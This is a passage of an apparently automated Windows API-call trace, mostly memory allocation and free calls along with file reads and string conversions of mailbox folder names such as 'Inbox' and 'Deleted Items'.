0x44112f0 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434100 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411150 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433df0 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x44118b0 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434040 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411390 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433eb0 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411950 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f70 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411630 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f40 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411610 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f90 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x44114b0 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e20 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x44118d0 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f50 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411650 [0251.738] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e50 [0251.738] LocalFree (hMem=0x5ce1dd0) returned 0x0 [0251.738] LocalFree (hMem=0xd1dc4b0) returned 0x0 [0251.738] LocalFree (hMem=0xd209b30) returned 0x0 [0251.739] LocalFree (hMem=0xd1dc7e0) returned 0x0 [0251.739] LocalFree (hMem=0xd1b7ca0) returned 0x0 [0251.739] LocalFree (hMem=0xd1da290) returned 0x0 [0251.739] LocalFree (hMem=0x5c28610) returned 0x0 [0251.739] LocalFree (hMem=0xd1da530) returned 0x0 [0251.739] LocalFree (hMem=0xd197a40) returned 0x0 [0251.739] LocalFree (hMem=0xd1d9de0) returned 0x0 [0251.739] LocalFree (hMem=0xd197cc0) returned 0x0 [0251.739] LocalFree (hMem=0xd1d9e40) returned 0x0 [0251.739] LocalFree (hMem=0xd197d60) returned 0x0 [0251.739] LocalFree (hMem=0xd1d9ed0) returned 0x0 [0251.739] LocalFree (hMem=0xd197d00) returned 0x0 [0251.739] LocalFree (hMem=0xd1dbc40) returned 0x0 [0251.739] LocalFree (hMem=0xd197c00) returned 0x0 [0251.739] LocalFree (hMem=0xd1dbcd0) returned 0x0 [0251.739] LocalFree (hMem=0xd197e40) returned 0x0 [0251.739] LocalFree (hMem=0xd1db460) returned 0x0 [0251.739] LocalFree (hMem=0xd197a60) returned 0x0 [0251.739] LocalFree (hMem=0xd1db610) returned 0x0 [0251.739] LocalFree (hMem=0xd197d20) returned 0x0 [0251.739] LocalFree (hMem=0xd1db520) returned 0x0 [0251.739] LocalFree (hMem=0xd197c20) returned 0x0 [0251.739] LocalFree (hMem=0xd1db6a0) returned 0x0 [0251.739] LocalFree (hMem=0xd197fc0) returned 0x0 [0251.739] LocalFree (hMem=0x443a150) returned 0x0 [0251.739] LocalFree (hMem=0xd197c40) returned 0x0 [0251.739] LocalFree (hMem=0x443a000) returned 0x0 [0251.739] LocalFree (hMem=0xd197d40) returned 0x0 [0251.739] LocalFree (hMem=0x4439f10) returned 0x0 [0251.739] LocalFree (hMem=0xd197e80) returned 0x0 [0251.739] LocalFree (hMem=0x443a180) returned 0x0 [0251.739] LocalFree (hMem=0x443a1e0) returned 0x0 [0251.739] LocalFree (hMem=0x443a1b0) returned 0x0 [0251.739] LocalFree (hMem=0x44386b0) returned 0x0 [0251.739] LocalFree (hMem=0x4439c10) returned 0x0 [0251.739] LocalFree (hMem=0xd198000) returned 0x0 [0251.739] LocalFree (hMem=0x44382f0) returned 0x0 [0251.739] LocalFree (hMem=0xd197d80) returned 0x0 [0251.739] LocalFree (hMem=0x4438350) returned 0x0 [0251.739] LocalFree (hMem=0xd197da0) returned 0x0 [0251.739] LocalFree (hMem=0x4439550) returned 0x0 [0251.739] LocalFree (hMem=0xd197de0) returned 0x0 [0251.739] LocalFree (hMem=0x4439700) returned 0x0 [0251.739] LocalFree (hMem=0xd197e60) returned 0x0 [0251.739] LocalFree (hMem=0x382a00) returned 0x0 [0251.739] LocalFree (hMem=0xd197dc0) returned 0x0 [0251.739] LocalFree (hMem=0x382af0) returned 0x0 [0251.740] LocalFree (hMem=0xd197ec0) returned 0x0 [0251.740] LocalFree (hMem=0x382bb0) returned 0x0 [0251.740] LocalFree (hMem=0xd198020) returned 0x0 [0251.740] LocalFree (hMem=0x382b20) returned 0x0 [0251.740] LocalFree (hMem=0xd197f00) returned 0x0 [0251.740] LocalFree (hMem=0x382c70) returned 0x0 [0251.740] LocalFree (hMem=0xd197960) returned 0x0 [0251.740] LocalFree (hMem=0x382fa0) returned 0x0 [0251.740] LocalFree (hMem=0xd197ee0) returned 0x0 [0251.740] LocalFree (hMem=0x3829d0) returned 0x0 [0251.740] LocalFree (hMem=0xd1979a0) returned 0x0 [0251.740] LocalFree (hMem=0x5be2550) returned 0x0 [0251.740] LocalFree (hMem=0xd198040) returned 0x0 [0251.740] LocalFree (hMem=0x5be20a0) returned 0x0 [0251.740] LocalFree (hMem=0xd198060) returned 0x0 [0251.740] LocalFree (hMem=0x5be2820) returned 0x0 [0251.740] LocalFree (hMem=0xd198080) returned 0x0 [0251.740] LocalFree (hMem=0x5be2cd0) returned 0x0 [0251.740] LocalFree (hMem=0xd1979c0) returned 0x0 [0251.740] LocalFree (hMem=0x5be30f0) returned 0x0 [0251.740] LocalFree (hMem=0xd197a80) returned 0x0 [0251.740] LocalFree (hMem=0x5be2f70) returned 0x0 [0251.740] LocalFree (hMem=0xd197ac0) returned 0x0 [0251.740] LocalFree (hMem=0x43c3e90) returned 0x0 [0251.740] LocalFree (hMem=0xd1944a0) returned 0x0 [0251.740] LocalFree (hMem=0x43c2a20) returned 0x0 [0251.740] LocalFree (hMem=0xd194180) returned 0x0 [0251.740] LocalFree (hMem=0x43c3a40) returned 0x0 [0251.740] LocalFree (hMem=0xd1946c0) returned 0x0 [0251.740] LocalFree (hMem=0x43c3770) returned 0x0 [0251.740] LocalFree (hMem=0xd1945e0) returned 0x0 [0251.740] LocalFree (hMem=0x43c30b0) returned 0x0 [0251.740] LocalFree (hMem=0xd1944c0) returned 0x0 [0251.740] LocalFree (hMem=0x43c34a0) returned 0x0 [0251.740] LocalFree (hMem=0xd194240) returned 0x0 [0251.740] LocalFree (hMem=0x5c1e140) returned 0x0 [0251.740] LocalFree (hMem=0xd194440) returned 0x0 [0251.740] LocalFree (hMem=0x5c1e620) returned 0x0 [0251.740] LocalFree (hMem=0xd1946e0) returned 0x0 [0251.740] LocalFree (hMem=0x5c1e680) returned 0x0 [0251.740] LocalFree (hMem=0xd194480) returned 0x0 [0251.740] LocalFree (hMem=0x5c1e980) returned 0x0 [0251.740] LocalFree (hMem=0xd194140) returned 0x0 [0251.740] LocalFree (hMem=0x5c1ebc0) returned 0x0 [0251.740] LocalFree (hMem=0xd194780) returned 0x0 [0251.740] LocalFree (hMem=0x5c1e1d0) returned 0x0 [0251.741] LocalFree (hMem=0xd194820) returned 0x0 [0251.741] LocalFree (hMem=0x4409f60) returned 0x0 [0251.741] LocalFree (hMem=0xd1948a0) returned 0x0 [0251.741] LocalFree (hMem=0x440a020) returned 0x0 [0251.741] LocalFree (hMem=0xd194200) returned 0x0 [0251.741] LocalFree (hMem=0x4409510) returned 0x0 [0251.741] LocalFree (hMem=0xd1941e0) returned 0x0 [0251.741] LocalFree (hMem=0x44095d0) returned 0x0 [0251.741] LocalFree (hMem=0xd194500) returned 0x0 [0251.741] LocalFree (hMem=0x4409720) returned 0x0 [0251.741] LocalFree (hMem=0xd1947a0) returned 0x0 [0251.741] LocalFree (hMem=0x5cb2f70) returned 0x0 [0251.741] LocalFree (hMem=0xd1944e0) returned 0x0 [0251.741] LocalFree (hMem=0x5cb3090) returned 0x0 [0251.741] LocalFree (hMem=0xd1942e0) returned 0x0 [0251.741] LocalFree (hMem=0x5cb3240) returned 0x0 [0251.741] LocalFree (hMem=0xd194400) returned 0x0 [0251.741] LocalFree (hMem=0x5cb1b30) returned 0x0 [0251.741] LocalFree (hMem=0xd194920) returned 0x0 [0251.741] LocalFree (hMem=0x398850) returned 0x0 [0251.741] LocalFree (hMem=0xd194520) returned 0x0 [0251.741] LocalFree (hMem=0x398a60) returned 0x0 [0251.741] LocalFree (hMem=0xd194160) returned 0x0 [0251.741] LocalFree (hMem=0x398b50) returned 0x0 [0251.741] LocalFree (hMem=0xd194420) returned 0x0 [0251.741] LocalFree (hMem=0x398e80) returned 0x0 [0251.741] LocalFree (hMem=0xd1941a0) returned 0x0 [0251.741] LocalFree (hMem=0x3607a0) returned 0x0 [0251.741] LocalFree (hMem=0xd194460) returned 0x0 [0251.741] LocalFree (hMem=0x360800) returned 0x0 [0251.741] LocalFree (hMem=0xd194540) returned 0x0 [0251.741] LocalFree (hMem=0x360ad0) returned 0x0 [0251.741] LocalFree (hMem=0xd194300) returned 0x0 [0251.741] LocalFree (hMem=0x43742d0) returned 0x0 [0251.741] LocalFree (hMem=0xd194560) returned 0x0 [0251.741] LocalFree (hMem=0x4374a80) returned 0x0 [0251.741] LocalFree (hMem=0xd194320) returned 0x0 [0251.741] LocalFree (hMem=0x4374ab0) returned 0x0 [0251.741] LocalFree (hMem=0xd1942c0) returned 0x0 [0251.741] LocalFree (hMem=0x411550) returned 0x0 [0251.741] LocalFree (hMem=0xd194580) returned 0x0 [0251.741] LocalFree (hMem=0x411a30) returned 0x0 [0251.741] LocalFree (hMem=0xd194900) returned 0x0 [0251.741] LocalFree (hMem=0x37ad90) returned 0x0 [0251.741] LocalFree (hMem=0xd194220) returned 0x0 [0251.741] LocalFree (hMem=0x34ea50) returned 0x0 [0251.742] LocalFree (hMem=0xd194360) returned 0x0 [0251.742] LocalFree (hMem=0x334510) returned 0x0 [0251.742] LocalFree (hMem=0xd194840) returned 0x0 [0251.742] LocalFree (hMem=0x3cc450) returned 0x0 [0251.742] LocalFree (hMem=0xd1948e0) returned 0x0 [0251.742] LocalFree (hMem=0x35d560) returned 0x0 [0251.742] LocalFree (hMem=0xd194860) returned 0x0 [0251.742] LocalFree (hMem=0x5d80050) returned 0x0 [0251.742] LocalFree (hMem=0xd1945a0) returned 0x0 [0251.742] LocalFree (hMem=0x5d1f080) returned 0x0 [0251.742] LocalFree (hMem=0xd194340) returned 0x0 [0251.742] LocalFree (hMem=0x5d1ed20) returned 0x0 [0251.742] LocalFree (hMem=0xd1941c0) returned 0x0 [0251.742] LocalFree (hMem=0x5d1ed50) returned 0x0 [0251.742] LocalFree (hMem=0xd1945c0) returned 0x0 [0251.742] LocalFree (hMem=0x5d1eb70) returned 0x0 [0251.742] LocalFree (hMem=0xd194740) returned 0x0 [0251.742] LocalFree (hMem=0x5d1ec90) returned 0x0 [0251.742] LocalFree (hMem=0xd194600) returned 0x0 [0251.742] LocalFree (hMem=0x5d1ecc0) returned 0x0 [0251.742] LocalFree (hMem=0xd1946a0) returned 0x0 [0251.742] LocalFree (hMem=0x5d1ee10) returned 0x0 [0251.742] LocalFree (hMem=0xd194880) returned 0x0 [0251.742] LocalFree (hMem=0x5d1ed80) returned 0x0 [0251.742] LocalFree (hMem=0xd194620) returned 0x0 [0251.742] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.742] LocalFree (hMem=0xd194760) returned 0x0 [0251.742] LocalFree (hMem=0x5d1f200) returned 0x0 [0251.742] LocalFree (hMem=0xd194640) returned 0x0 [0251.742] LocalFree (hMem=0x5d1ede0) returned 0x0 [0251.742] LocalFree (hMem=0xd194720) returned 0x0 [0251.742] LocalFree (hMem=0x5d1e990) returned 0x0 [0251.742] LocalFree (hMem=0xd194380) returned 0x0 [0251.742] LocalFree (hMem=0x5d1e9c0) returned 0x0 [0251.742] LocalFree (hMem=0xd1943a0) returned 0x0 [0251.742] LocalFree (hMem=0x5d1f260) returned 0x0 [0251.742] LocalFree (hMem=0xd194260) returned 0x0 [0251.742] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.742] LocalFree (hMem=0xd1947c0) returned 0x0 [0251.742] LocalFree (hMem=0x5d1eed0) returned 0x0 [0251.742] LocalFree (hMem=0xd1947e0) returned 0x0 [0251.742] LocalFree (hMem=0x5d1f4a0) returned 0x0 [0251.742] LocalFree (hMem=0xd1943c0) returned 0x0 [0251.742] LocalFree (hMem=0x5d1e9f0) returned 0x0 [0251.742] LocalFree (hMem=0xd1948c0) returned 0x0 [0251.742] LocalFree (hMem=0x5d1ec60) returned 0x0 [0251.743] LocalFree (hMem=0xd194800) returned 0x0 [0251.743] LocalFree (hMem=0x5d1ea20) returned 0x0 [0251.743] LocalFree (hMem=0xd342010) returned 0x0 [0251.743] LocalFree (hMem=0xd1dc480) returned 0x0 [0251.743] bsearch (_Key=0x235e528, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84968 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x1c0) returned 0x5d3bca0 [0251.743] SetFilePointer (in: hFile=0xb48, lDistanceToMove=36352, lpDistanceToMoveHigh=0x235e4e8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4e8*=0) returned 0x8e00 [0251.743] ReadFile (in: hFile=0xb48, lpBuffer=0x5d3bca0, nNumberOfBytesToRead=0x1c0, lpNumberOfBytesRead=0x235e4f8, lpOverlapped=0x0 | out: lpBuffer=0x5d3bca0*, lpNumberOfBytesRead=0x235e4f8*=0x1c0, lpOverlapped=0x0) returned 1 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411330 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1eb70 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x220) returned 0x5dab380 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec90 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1f260 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ecc0 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f10 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee10 [0251.743] LocalAlloc (uFlags=0x40, uBytes=0x11) returned 0x44118f0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed20 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x1d) returned 0x5d1f3e0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed80 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x400) returned 0x5cd58c0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f200 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x400) returned 0x5cd60e0 [0251.744] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="lcfkj@kiekc.df", cchWideChar=30, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="lcfkj@kiekc.df", lpUsedDefaultChar=0x0) returned 30 [0251.744] LocalFree (hMem=0x5d1f3e0) returned 0x0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x1e) returned 0x5d1ede0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1e990 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f230 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433da0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec60 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1f290 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ecf0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1ee40 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1e9c0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1eed0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f320 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1f4a0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f2f0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1e9f0 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ed50 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1ee70 [0251.744] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f410 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1ea20 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f350 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433dd0 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f380 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434050 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eea0 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434060 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f170 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434110 [0251.745] LocalFree (hMem=0x5d3bca0) returned 0x0 [0251.745] LocalFree (hMem=0x4411330) returned 0x0 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d39710 [0251.745] LocalFree (hMem=0x5d1f260) returned 0x0 [0251.745] LocalFree (hMem=0x4433f10) returned 0x0 [0251.745] LocalFree (hMem=0x44118f0) returned 0x0 [0251.745] LocalFree (hMem=0x5d1ede0) returned 0x0 [0251.745] LocalFree (hMem=0x5d1e990) returned 0x0 [0251.745] LocalFree (hMem=0x4433da0) returned 0x0 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x48) returned 0xd1bdd40 [0251.745] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1ef00 [0251.745] LocalFree (hMem=0x5d1ee40) returned 0x0 [0251.745] LocalFree (hMem=0x5d1eed0) returned 0x0 [0251.745] LocalFree (hMem=0x5d1f4a0) returned 0x0 [0251.745] LocalFree (hMem=0x5d1e9f0) returned 0x0 [0251.745] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.745] LocalFree (hMem=0x5d1ea20) returned 0x0 [0251.745] LocalFree (hMem=0x4433dd0) returned 0x0 [0251.745] LocalFree (hMem=0x4434050) returned 0x0 [0251.745] LocalFree (hMem=0x4434060) returned 0x0 [0251.745] LocalFree (hMem=0x4434110) returned 0x0 [0251.745] LocalFree (hMem=0x5d1ec90) returned 0x0 [0251.745] LocalFree (hMem=0x5d1ecc0) returned 0x0 [0251.745] LocalFree (hMem=0x5d1ee10) returned 0x0 [0251.745] LocalFree (hMem=0x5d1ed20) returned 0x0 [0251.745] LocalFree (hMem=0x5d1edb0) returned 0x0 [0251.745] LocalFree (hMem=0x5d1f230) returned 0x0 [0251.745] LocalFree (hMem=0x5d1f290) returned 0x0 [0251.746] LocalFree (hMem=0x5d1ec60) returned 0x0 [0251.746] LocalFree (hMem=0x5d1ecf0) returned 0x0 [0251.746] LocalFree (hMem=0x5d1e9c0) returned 0x0 [0251.746] LocalFree (hMem=0x5d1f320) returned 0x0 [0251.746] LocalFree (hMem=0x5d1f2f0) returned 0x0 [0251.746] LocalFree (hMem=0x5d1ed50) returned 0x0 [0251.746] LocalFree (hMem=0x5d1f410) returned 0x0 [0251.746] LocalFree (hMem=0x5d1f350) returned 0x0 [0251.746] LocalFree (hMem=0x5d1f380) returned 0x0 [0251.746] LocalFree (hMem=0x5d1eea0) returned 0x0 [0251.746] LocalFree (hMem=0x5d1f170) returned 0x0 [0251.746] LocalFree (hMem=0x5dab380) returned 0x0 [0251.746] LocalFree (hMem=0x5d1eb70) returned 0x0 [0251.746] LocalFree (hMem=0xd1bdd40) returned 0x0 [0251.746] LocalFree (hMem=0x5d39710) returned 0x0 [0251.746] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84558 [0251.746] LocalAlloc (uFlags=0x40, uBytes=0x8c) returned 0x43c4c50 [0251.746] SetFilePointer (in: hFile=0xb48, lDistanceToMove=18624, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0x48c0 [0251.746] ReadFile (in: hFile=0xb48, lpBuffer=0x43c4c50, nNumberOfBytesToRead=0x8c, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0x43c4c50*, lpNumberOfBytesRead=0x235e4c8*=0x8c, lpOverlapped=0x0) returned 1 [0251.746] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x44114f0 [0251.746] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f1a0 [0251.746] LocalAlloc (uFlags=0x40, uBytes=0xa0) returned 0xd1d1360 [0251.746] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1e9f0 [0251.746] LocalAlloc (uFlags=0x40, uBytes=0x1b) returned 0x5d1f110 [0251.746] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Deleted Items", cchWideChar=28, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleted Items", lpUsedDefaultChar=0x0) returned 28 [0251.746] LocalFree (hMem=0x5d1f110) returned 0x0 [0251.746] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1ec00 [0251.746] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eab0 [0251.746] LocalAlloc (uFlags=0x40, uBytes=0x29) returned 0x5d1b1e0 [0251.747] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Deleted Items folder", cchWideChar=42, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Deleted Items folder", lpUsedDefaultChar=0x0) returned 42 [0251.747] LocalFree (hMem=0x5d1b1e0) returned 0x0 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0x2a) returned 0x5d1b3e0 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee70 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433d90 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ecc0 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f60 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f170 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433da0 [0251.747] LocalFree (hMem=0x43c4c50) returned 0x0 [0251.747] LocalFree (hMem=0x44114f0) returned 0x0 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d38510 [0251.747] LocalFree (hMem=0x5d1ec00) returned 0x0 [0251.747] LocalFree (hMem=0x5d1b3e0) returned 0x0 [0251.747] LocalFree (hMem=0x4433d90) returned 0x0 [0251.747] LocalFree (hMem=0x4433f60) returned 0x0 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0x10) returned 0x44114f0 [0251.747] LocalFree (hMem=0x5d1e9f0) returned 0x0 [0251.747] LocalFree (hMem=0x5d1eab0) returned 0x0 [0251.747] LocalFree (hMem=0x5d1ee70) returned 0x0 [0251.747] LocalFree (hMem=0x5d1ecc0) returned 0x0 [0251.747] LocalFree (hMem=0x4433da0) returned 0x0 [0251.747] LocalFree (hMem=0x5d1f170) returned 0x0 [0251.747] LocalFree (hMem=0xd1d1360) returned 0x0 [0251.747] LocalFree (hMem=0x5d1f1a0) returned 0x0 [0251.747] LocalFree (hMem=0x44114f0) returned 0x0 [0251.747] LocalFree (hMem=0x5d38510) returned 0x0 [0251.747] bsearch (_Key=0x235e4f8, _Base=0x5d84300, _NumOfElements=0x49, _SizeOfElements=0x28, _PtFuncCompare=0x74a4194) returned 0x5d84ad0 [0251.747] LocalAlloc (uFlags=0x40, uBytes=0x236) returned 0x4362050 [0251.747] SetFilePointer (in: hFile=0xb48, lDistanceToMove=53184, lpDistanceToMoveHigh=0x235e4b8*=0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x235e4b8*=0) returned 0xcfc0 [0251.747] ReadFile (in: hFile=0xb48, lpBuffer=0x4362050, nNumberOfBytesToRead=0x236, lpNumberOfBytesRead=0x235e4c8, lpOverlapped=0x0 | out: lpBuffer=0x4362050*, lpNumberOfBytesRead=0x235e4c8*=0x236, lpOverlapped=0x0) returned 1 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x18) returned 0x4411770 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x1c) returned 0x5d1f350 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x1e0) returned 0xd181810 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f320 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0xb) returned 0x4411690 [0251.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Inbox", cchWideChar=12, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Inbox", lpUsedDefaultChar=0x0) returned 12 [0251.748] LocalFree (hMem=0x4411690) returned 0x0 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0xc) returned 0x44114f0 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1edb0 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1ebd0 [0251.748] WideCharToMultiByte (in: CodePage=0xfde9, dwFlags=0x0, lpWideCharStr="Inbox folder", cchWideChar=26, lpMultiByteStr=0x5cd60e0, cbMultiByte=1024, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="Inbox folder", lpUsedDefaultChar=0x0) returned 26 [0251.748] LocalFree (hMem=0x5d1ebd0) returned 0x0 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x1a) returned 0x5d1f260 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb40 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4434080 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f140 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433e70 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f1a0 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x4) returned 0x4433f10 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ee40 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1eed0 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ef30 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1f2c0 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eb70 [0251.748] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1eae0 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ea80 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1ee70 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ec90 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1eba0 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f110 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1f3e0 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1ebd0 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x19) returned 0x5d1f1d0 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f380 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x35) returned 0x5d1b1e0 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1eab0 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x85) returned 0xd1b3650 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x20) returned 0x5d1f230 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0x7) returned 0x4433dc0 [0251.749] LocalFree (hMem=0x4362050) returned 0x0 [0251.749] LocalFree (hMem=0x4411770) returned 0x0 [0251.749] LocalAlloc (uFlags=0x40, uBytes=0xec) returned 0x5d38010 [0251.749] LocalFree (hMem=0x44114f0) returned 0x0 [0251.749] LocalFree (hMem=0x5d1f260) returned 0x0 [0251.749] LocalFree (hMem=0x4434080) returned 0x0 [0251.749] LocalFree (hMem=0x4433e70) returned 0x0 [0251.749] 